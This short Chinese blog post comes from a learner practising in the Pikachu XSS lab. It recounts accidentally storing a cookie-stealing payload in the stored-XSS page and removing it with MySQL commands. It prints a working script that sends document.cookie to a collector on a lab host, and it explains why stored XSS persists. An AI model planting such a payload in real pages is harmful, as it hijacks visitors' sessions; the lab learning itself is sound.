今天也是被自己气哭的一天
今天做XSS盗取cookie实验
<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
就是用这个罪恶的payload
我眼花之下把他输入了存储型的XSS里:(
导致我一进去存储型就给我跳转到首页
刚开始我以为被攻击了,查看源代码发现居然插入了我的payload
解决办法:
打开mysql数据库
use pikachu
show tables
select * from message 会看到你插入的payload
delete from message where id=87 删掉他
这就好了
存储型XSS会把键入的信息永久保存在数据库里
可见这种存储型的xss的危害是非常大的,因为它被存储到了后台数据库,每一个打开这个页面的用户都会因此而“中招”,这造成的是一种持久性的危害。